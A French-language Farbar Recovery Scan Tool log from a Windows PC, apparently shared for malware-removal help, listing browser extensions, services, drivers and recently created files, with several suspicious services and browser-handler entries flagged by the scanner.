FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\windows\SysWOW64\Adobe\Director\np32dsw_1204144.dll [2013-09-05] (Adobe Systems, Inc.)
FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/pdf -> C:\Program Files (x86)\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll [2016-03-24] (Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/vnd.fdf -> C:\Program Files (x86)\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll [2016-03-24] (Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/vnd.xdp -> C:\Program Files (x86)\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll [2016-03-24] (Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/vnd.xfdf -> C:\Program Files (x86)\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll [2016-03-24] (Foxit Corporation)
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2012-10-01] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office15\NPSPWRAP.DLL [2012-10-01] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.17\npGoogleUpdate3.dll [2018-05-18] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.17\npGoogleUpdate3.dll [2018-05-18] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.2.1 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2017-05-24] (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.6 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2017-05-24] (VideoLAN)
FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\0\NP_wtapp.dll [2013-08-06] ()
FF Plugin-x32: TorchVLC -> C:\Users\pc1\AppData\Local\Torch\Plugins\Video\VLC\npvlc.dll [Pas de fichier]
FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\defaults\pref\29514203.js [2017-01-27] <==== ATTENTION (Pointe vers un fichier *.cfg)
FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\29514203.cfg [2017-01-27] <==== ATTENTION

Chrome:
=======
CHR DefaultProfile: Profile 1
CHR Profile: C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Default [2017-01-27]
CHR Extension: (Google Slides) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-07-08]
CHR Extension: (Google Docs) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-07-08]
CHR Extension: (Google Drive) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-11-07]
CHR Extension: (YouTube) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-10-01]
CHR Extension: (Recherche Google) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-11-07]
CHR Extension: (ZenMate VPN - Sécurité internet & Unblock) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Default\Extensions\fdcgdnkidjaadafnichfpabhfomcebme [2016-12-06]
CHR Extension: (Google Sheets) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-07-08]
CHR Extension: (Google Docs hors connexion) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-05-01]
CHR Extension: (Skype) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Default\Extensions\lifbcibllhkdhoafpjfnlhfpfgnpldfl [2016-12-06]
CHR Extension: (Kaspersky Protection) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Default\Extensions\lpeeaghdjmhlakojjcgfdhgcejdaefmi [2017-01-27]
CHR Extension: (Paiements via le Chrome Web Store) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-01-21]
CHR Extension: (Fast search) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Default\Extensions\pbdpajcdgknpendpmecafmopknefafha [2017-01-27]
CHR Extension: (Gmail) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-07-08]
CHR Extension: (Chrome Media Router) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-01-21]
CHR Profile: C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Guest Profile [2018-05-29]
CHR Profile: C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 1 [2018-07-26]
CHR Extension: (Google Drive) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\apdfllckaahabafndbhieahigkjlhalf [2017-12-19]
CHR Extension: (Touch VPN) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\bihmplhobchoageeokmgbdihknkjbknd [2018-07-17]
CHR Extension: (YouTube) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2017-12-19]
CHR Extension: (Paiements via le Chrome Web Store) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2018-07-09]
CHR Extension: (Gmail) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2017-12-19]
CHR Extension: (Chrome Media Router) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2018-07-10]
CHR Profile: C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 3 [2018-07-26]
CHR Extension: (Google Drive) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\apdfllckaahabafndbhieahigkjlhalf [2018-07-17]
CHR Extension: (Touch VPN) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\bihmplhobchoageeokmgbdihknkjbknd [2018-07-17]
CHR Extension: (YouTube) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2018-07-17]
CHR Extension: (Paiements via le Chrome Web Store) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2018-07-17]
CHR Extension: (Gmail) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2018-07-17]
CHR Extension: (Chrome Media Router) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2018-07-17]
CHR Profile: C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 4 [2018-07-26]
CHR Extension: (Google Drive) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 4\Extensions\apdfllckaahabafndbhieahigkjlhalf [2018-07-17]
CHR Extension: (Touch VPN) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 4\Extensions\bihmplhobchoageeokmgbdihknkjbknd [2018-07-17]
CHR Extension: (YouTube) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 4\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2018-07-17]
CHR Extension: (Paiements via le Chrome Web Store) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 4\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2018-07-17]
CHR Extension: (Gmail) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 4\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2018-07-17]
CHR Extension: (Chrome Media Router) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 4\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2018-07-17]
CHR Profile: C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 5 [2018-07-26]
CHR Extension: (Google Drive) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 5\Extensions\apdfllckaahabafndbhieahigkjlhalf [2018-07-17]
CHR Extension: (Touch VPN) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 5\Extensions\bihmplhobchoageeokmgbdihknkjbknd [2018-07-17]
CHR Extension: (YouTube) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 5\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2018-07-17]
CHR Extension: (Paiements via le Chrome Web Store) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 5\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2018-07-17]
CHR Extension: (Gmail) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 5\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2018-07-17]
CHR Extension: (Chrome Media Router) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 5\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2018-07-17]
CHR Profile: C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 6 [2018-07-26]
CHR Extension: (Google Drive) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 6\Extensions\apdfllckaahabafndbhieahigkjlhalf [2018-07-17]
CHR Extension: (Touch VPN) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 6\Extensions\bihmplhobchoageeokmgbdihknkjbknd [2018-07-17]
CHR Extension: (YouTube) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 6\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2018-07-17]
CHR Extension: (Paiements via le Chrome Web Store) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 6\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2018-07-17]
CHR Extension: (Gmail) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 6\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2018-07-17]
CHR Extension: (Chrome Media Router) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 6\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2018-07-17]
CHR Profile: C:\Users\pc1\AppData\Local\Google\Chrome\User Data\System Profile [2018-07-17]
CHR HKU\S-1-5-21-813913080-1538114768-4122880109-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [dhdgffkkebhmkfjojejmpbldmpobfkfo] - hxxp://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - hxxps://clients2.google.com/service/update2/crx
HKU\.DEFAULT\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Fanlook\Application\chrome.exe (Google Inc.) <==== ATTENTION
HKU\S-1-5-21-813913080-1538114768-4122880109-1001\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Bookness\Application\chrome.exe (Google Inc.) <==== ATTENTION
HKU\S-1-5-18\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Fanlook\Application\chrome.exe (Google Inc.) <==== ATTENTION

Opera:
=======
OPR Extension: (Proxy SurfEasy, une Société d'Opera Software) - C:\Users\pc1\AppData\Roaming\Opera Software\Opera Stable\Extensions\ebpielhlnnpkiddeeacoephkilopgblc [2017-07-05]
OPR Extension: (SaveFrom.net helper) - C:\Users\pc1\AppData\Roaming\Opera Software\Opera Stable\Extensions\npdpplbicnmpoigidfdjadamgfkilaak [2018-03-20]

==================== Services (Avec liste blanche) ====================

(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)

R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [83768 2017-04-03] (Apple Inc.)
R2 BTDevManager; C:\Program Files (x86)\REALTEK\Realtek Bluetooth\BTDevMgr.exe [98816 2014-10-11] () [Fichier non signé]
S2 CG6Service; C:\Program Files\CyberGhost 6\CyberGhost.Service.exe [232528 2017-08-31] (CyberGhost S.A.)
S2 Cluseywreph; C:\Windows\system32\svchost.exe [38792 2014-10-29] (Microsoft Corporation) <==== ATTENTION (pas de ServiceDLL)
S2 Cluseywreph; C:\Windows\SysWOW64\svchost.exe [33088 2014-10-29] (Microsoft Corporation) <==== ATTENTION (pas de ServiceDLL)
S3 FLEXnet Licensing Service; C:\Program Files (x86)\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe [654848 2016-03-09] (Macrovision Europe Ltd.) [Fichier non signé]
R2 GamesAppIntegrationService; C:\Program Files (x86)\WildTangent Games\App\GamesAppIntegrationService.exe [255040 2014-08-25] (WildTangent)
S2 GubedZL; C:\Windows\SysWOW64\svchost.exe [33088 2014-10-29] (Microsoft Corporation) <==== ATTENTION (pas de ServiceDLL)
S2 GubZL; C:\Windows\SysWOW64\svchost.exe [33088 2014-10-29] (Microsoft Corporation) <==== ATTENTION (pas de ServiceDLL)
S3 hpqcaslwmiex; C:\Program Files (x86)\HP\Shared\hpqwmiex.exe [1031704 2016-06-03] (HP)
R2 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [333688 2018-06-13] (HP Inc.)
R2 HPWMISVC; C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPWMISVC.exe [509192 2014-09-02] (Hewlett-Packard Development Company, L.P.)
R2 HWDeviceService64.exe; C:\ProgramData\DatacardService\HWDeviceService64.exe [351824 2013-02-06] ()
R2 iedvutils; C:\Program Files (x86)\Explorer\iedvutils.exe [55992 2017-03-01] ()
R2 igfxCUIService1.0.0.0; C:\Windows\system32\igfxCUIService.exe [318568 2014-10-15] (Intel Corporation)
R2 Intel(R) Capability Licensing Service Interface; C:\Program Files\Intel\TXE Components\TCS\HeciServer.exe [733696 2013-07-01] (Intel(R) Corporation) [Fichier non signé]
S3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\TXE Components\TCS\SocketHeciServer.exe [822232 2013-07-01] (Intel(R) Corporation)
R2 Mobile Broadband HL Service; C:\ProgramData\MobileBrServ\mbbservice.exe [239184 2014-02-15] ()
S2 MTN Online. RunOuc; C:\Program Files (x86)\MTN Online\UpdateDog\ouc.exe [656976 2013-05-21] ()
R2 NoIPDUCService4; C:\Program Files (x86)\No-IP\ducservice.exe [12288 2015-07-20] () [Fichier non signé]
R2 omniserv; C:\Program Files\Hewlett-Packard\SimplePass\OmniServ.exe [88064 2014-03-28] (Softex Inc.) [Fichier non signé]
R2 RichVideo64; C:\Program Files\CyberLink\Shared files\RichVideo64.exe [389896 2014-04-14] ()
R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [291032 2014-08-19] (Realtek Semiconductor)
R2 SpliCamService; C:\Program Files (x86)\SplitCam\SplitCamService.exe [321064 2016-10-19] (SplitCam Co.)
R2 ss_conn_service; C:\Program Files\SAMSUNG\USB Drivers\25_escape\conn\ss_conn_service.exe [743688 2014-12-03] (DEVGURU Co., LTD.)
S3 SwitchBoard; C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated) [Fichier non signé]
R2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [191728 2014-09-17] (Synaptics Incorporated)
S2 Themes; C:\Windows\system32\themeservice.dll [59392 2014-10-29] (Microsoft Corporation) [DependOnService: iThemes5]<==== ATTENTION
R2 TorchCrashHandler; C:\Users\pc1\AppData\Local\Torch\Update\TorchCrashHandler.exe [1216520 2014-06-02] (TorchMedia Inc.) <==== ATTENTION
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [361824 2017-01-12] (Microsoft Corporation)
R2 wiasvc; C:\ProgramData\Microsoft\Windows\Image\capCADF.tmp:ad [212994 ] () [Fichier non signé] <==== ATTENTION <==== ATTENTION
R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [119872 2017-01-12] (Microsoft Corporation)
S2 ed2kidle; "C:\Program Files (x86)\amuleCe\ed2k.exe" -downloadwhenidle [X]
S3 klvssbrigde64; "C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 16.0.1\x64\vssbridge64.exe" [X]

===================== Pilotes (Avec liste blanche) ======================

(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)

S3 aswTap; C:\Windows\system32\DRIVERS\aswTap.sys [53904 2017-12-05] (The OpenVPN Project)
R1 CLVirtualDrive; C:\Windows\system32\DRIVERS\CLVirtualDrive.sys [91912 2013-11-12] (CyberLink)
S3 dg_ssudbus; C:\Windows\system32\DRIVERS\ssudbus.sys [131984 2017-05-18] (Samsung Electronics Co., Ltd.)
R3 GPIO; C:\Windows\System32\drivers\iaiogpioe.sys [31232 2013-11-11] (Intel Corporation)
S3 huawei_wwanecm; C:\Windows\system32\DRIVERS\ew_juwwanecm.sys [245760 2013-05-28] (Huawei Technologies Co., Ltd.)
S3 hwdatacard; C:\Windows\system32\DRIVERS\ZDDriver.sys [122496 2010-01-19] (ZD Secret Incorporated)
R1 HWiNFO32; C:\Windows\SysWOW64\drivers\HWiNFO64A.SYS [27552 2017-01-27] (REALiX(tm))
R0 MBI; C:\Windows\System32\drivers\MBI.sys [29464 2014-01-23] (Intel Corporation)
S0 mfeelamk; C:\Windows\System32\drivers\mfeelamk.sys [80160 2015-02-13] (McAfee, Inc.)
S1 MpKsl13259c42; C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{B6017820-EC4E-4598-B3F1-428452ECCF27}\MpKsl13259c42.sys [58120 2018-07-26] () [Fichier non signé]
S3 RimUsb; C:\Windows\System32\Drivers\RimUsb_AMD64.sys [27520 2007-05-14] (Research In Motion Limited)
R3 RSP2STOR; C:\Windows\system32\DRIVERS\RtsP2Stor.sys [294104 2014-08-19] (Realtek Semiconductor Corp.)
R3 RtkBtFilter; C:\Windows\system32\DRIVERS\RtkBtfilter.sys [580824 2014-09-10] (Realtek Semiconductor Corporation)
R3 RTWlanE; C:\Windows\system32\DRIVERS\rtwlane.sys [3593432 2014-10-08] (Realtek Semiconductor Corporation )
R3 scvad_simple; C:\Windows\system32\drivers\SplitCamAudio.sys [23552 2016-08-02] (Windows (R) Win 7 DDK provider)
S3 SmbDrv; C:\Windows\System32\drivers\Smb_driver_AMDASF.sys [32496 2014-09-17] (Synaptics Incorporated)
R3 SmbDrvI; C:\Windows\system32\DRIVERS\Smb_driver_Intel.sys [33008 2014-09-17] (Synaptics Incorporated)
R3 splitcam_hd_driver; C:\Windows\system32\DRIVERS\splitcam_hd_driver.sys [37600 2016-08-02] (Windows (R) Win 7 DDK provider)
S3 ssudmdm; C:\Windows\system32\DRIVERS\ssudmdm.sys [166288 2017-05-18] (Samsung Electronics Co., Ltd.)
R3 TXEIx64; C:\Windows\System32\drivers\TXEIx64.sys [88592 2014-01-15] (Intel Corporation)
S0 WdBoot; C:\Windows\System32\drivers\WdBoot.sys [46600 2017-02-10] (Microsoft Corporation)
R0 WdFilter; C:\Windows\System32\drivers\WdFilter.sys [274776 2017-01-12] (Microsoft Corporation)
S3 wdm_usb; C:\Windows\system32\DRIVERS\usb2ser.sys [159936 2016-08-16] (MBB)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [117592 2017-01-12] (Microsoft Corporation)
R3 WirelessButtonDriver; C:\Windows\System32\drivers\WirelessButtonDriver64.sys [20800 2013-07-22] (Hewlett-Packard Development Company, L.P.)
S1 bindrllc; \??\C:\Windows\system32\drivers\bindrllc.sys [X]
S1 cguzgitl; \??\C:\Windows\system32\drivers\cguzgitl.sys [X]
U2 CWASRE; pas de ImagePath
S3 hmatap; \SystemRoot\system32\DRIVERS\hmatap.sys [X]
S1 lrbfpuox; \??\C:\Windows\system32\drivers\lrbfpuox.sys [X]
S1 okrsbjeh; \??\C:\Windows\system32\drivers\okrsbjeh.sys [X]
U2 snare; pas de ImagePath
U2 WinSnare; pas de ImagePath
S1 yahpbvdi; \??\C:\Windows\system32\drivers\yahpbvdi.sys [X]

==================== NetSvcs (Avec liste blanche) ===================

(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)


==================== Un mois - Créés - fichiers et dossiers ========

(Si un élément est inclus dans le fichier fixlist.txt, le fichier/dossier sera déplacé.)

2018-07-26 23:42 - 2018-07-26 23:51 - 000044324 _____ C:\Users\pc1\Desktop\FRST.txt
2018-07-26 23:42 - 2018-07-26 23:50 - 000000000 ____D C:\FRST
2018-07-26 23:40 - 2018-07-26 23:40 - 002412544 _____ (Farbar) C:\Users\pc1\Desktop\farbar-recovery-scan-tool-64-bits_19-07-2018_fr_432987_64.exe
2018-07-26 18:29 - 2007-03-23 16:55 - 000035928 _____ (Adobe Systems Incorporated.) C:\Windows\system32\AdobePDF64.dll
2018-07-23 19:13 - 2018-07-23 19:15 - 066817040 _____ (Matisoft ) C:\Users\pc1\Downloads\Contact-Express (1).exe
2018-07-23 18:43 - 2018-07-23 18:44 - 002901585 _____ C:\Users\pc1\Downloads\bvs_ag_2015_08-09.pdf
2018-07-23 18:32 - 2018-07-23 18:32 - 001412436 _____ C:\Users\pc1\Downloads\organisme-habilite-sst (3).pdf
2018-07-23 16:28 - 2018-07-23 16:29 - 002309248 _____ C:\Users\pc1\Downloads\semaineindustrie2018.0723.xlsx
2018-07-23 16:27 - 2018-07-23 16:27 - 000700326 _____ C:\Users\pc1\Downloads\00_Texte_Revue_Sante_1er_Novembre_2010_.pdf
2018-07-23 16:22 - 2018-07-23 16:22 - 013151503 _____ C:\Users\pc1\Downloads\4com-2018.pdf
2018-07-20 18:55 - 2018-07-20 18:55 - 000000295 _____ C:\Users\pc1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Corbeille.lnk
2018-07-20 18:51 - 2018-07-25 20:13 - 000000000 ____D C:\Users\pc1\Desktop\app
2018-07-20 00:27 - 2018-07-20 00:27 - 000000132 _____ C:\Users\pc1\AppData\Roaming\Préfs Format PNG Adobe CS6
2018-07-19 18:15 - 2018-07-19 18:16 - 000410398 _____ C:\Users\pc1\Downloads\declaration de contrat de pret.pdf
2018-07-19 14:37 - 2018-06-20 21:01 - 007398232 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2018-07-19 14:37 - 2018-06-15 04:01 - 004169216 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2018-07-19 14:37 - 2018-06-12 09:00 - 022374248 _____ (Microsoft Corporation) C:\Windows\system32\shell32.dll
2018-07-19 14:37 - 2018-06-12 08:57 - 019790760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\shell32.dll
2018-07-19 14:37 - 2018-06-11 17:55 - 025744896 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2018-07-19 14:37 - 2018-06-11 17:06 - 005779968 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2018-07-19 14:37 - 2018-06-11 16:36 - 015283200 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2018-07-19 14:37 - 2018-06-09 17:40 - 020286976 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2018-07-19 14:37 - 2018-06-09 16:37 - 004496384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2018-07-19 14:37 - 2018-06-09 16:36 - 013680128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2018-07-19 14:36 - 2018-06-20 20:44 - 001676064 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi
2018-07-19 14:36 - 2018-06-20 20:44 - 001536120 _____ (Microsoft Corporation) C:\Windows\system32\winload.exe
2018-07-19 14:36 - 2018-06-20 19:48 - 000095744 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\amdk8.sys
2018-07-19 14:36 - 2018-06-20 19:48 - 000027136 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\fxppm.sys
2018-07-19 14:36 - 2018-06-20 17:58 - 000098816 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\intelppm.sys
2018-07-19 14:36 - 2018-06-20 17:58 - 000098816 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\amdppm.sys
2018-07-19 14:36 - 2018-06-20 17:58 - 000092672 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\processr.sys
2018-07-19 14:36 - 2018-06-11 17:36 - 003119616 _____ (Microsoft Corporation) C:\Windows\system32\ExplorerFrame.dll
2018-07-19 14:36 - 2018-06-11 17:14 - 000576512 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2018-07-19 14:36 - 2018-06-11 17:04 - 000794624 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2018-07-19 14:36 - 2018-06-11 16:39 - 001033216 _____ (Microsoft Corporation) C:\Windows\system32\inetcomm.dll
2018-07-19 14:36 - 2018-06-11 16:31 - 000809472 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2018-07-19 14:36 - 2018-06-11 16:22 - 003241472 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2018-07-19 14:36 - 2018-06-11 16:11 - 001545216 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2018-07-19 14:36 - 2018-06-11 15:59 - 000800768 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2018-07-19 14:36 - 2018-06-09 17:26 - 002712064 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ExplorerFrame.dll
2018-07-19 14:36 - 2018-06-09 17:09 - 000498176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2018-07-19 14:36 - 2018-06-09 16:59 - 000662016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2018-07-19 14:36 - 2018-06-09 16:37 - 000880640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcomm.dll
2018-07-19 14:36 - 2018-06-09 16:32 - 000696320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2018-07-19 14:36 - 2018-06-09 16:11 - 002767872 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2018-07-19 14:36 - 2018-06-09 16:08 - 001313792 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2018-07-19 14:36 - 2018-06-09 16:06 - 000710144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2018-07-19 14:36 - 2018-06-09 03:47 - 002176072 _____ (Microsoft Corporation) C:\Windows\system32\combase.dll
2018-07-19 14:36 - 2018-06-09 02:44 - 001565528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\combase.dll
2018-07-19 14:36 - 2018-06-08 19:26 - 000440832 _____ (Microsoft Corporation) C:\Windows\system32\zipfldr.dll
2018-07-19 14:36 - 2018-06-08 18:54 - 000656384 _____ (Microsoft Corporation) C:\Windows\system32\dnsapi.dll
2018-07-19 14:36 - 2018-06-08 18:53 - 000252416 _____ (Microsoft Corporation) C:\Windows\system32\dnsrslvr.dll
2018-07-19 14:36 - 2018-06-08 18:07 - 000404992 _____ (Microsoft Corporation) C:\Windows\SysWOW64\zipfldr.dll
2018-07-19 14:36 - 2018-06-08 17:44 - 000499200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dnsapi.dll
2018-07-19 14:36 - 2018-06-07 19:51 - 000074240 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mpsdrv.sys
2018-07-19 14:36 - 2018-05-24 22:29 - 002449752 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tcpip.sys
2018-07-19 14:36 - 2018-05-24 22:29 - 000428888 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\FWPKCLNT.SYS
2018-07-19 14:36 - 2018-05-15 09:42 - 000590680 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\fvevol.sys
2018-07-19 14:36 - 2018-05-04 00:02 - 000439640 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbport.sys
2018-07-19 14:36 - 2018-05-04 00:02 - 000325456 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\USBXHCI.SYS
2018-07-19 14:36 - 2018-05-04 00:02 - 000187728 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\UCX01000.SYS
2018-07-19 14:36 - 2018-04-26 14:43 - 000918296 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ucrtbase.dll
